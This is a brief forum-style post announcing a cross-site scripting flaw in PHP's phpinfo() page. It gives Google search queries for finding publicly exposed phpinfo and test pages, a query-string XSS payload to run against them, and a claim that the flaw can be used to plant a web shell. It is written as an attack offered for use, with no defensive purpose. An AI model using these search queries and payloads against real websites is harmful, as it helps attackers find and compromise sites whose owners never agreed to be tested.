I have recently found info about a new xss vulnerability in phpinfo(). Figured I'd share it here as well:
The google search:
inurl:phpinfo.php
or
inurl:test.php + intitle:phpinfo()
The xss code:
?a[]=alert(/XSS/);
This can be leveraged to plant a web shell...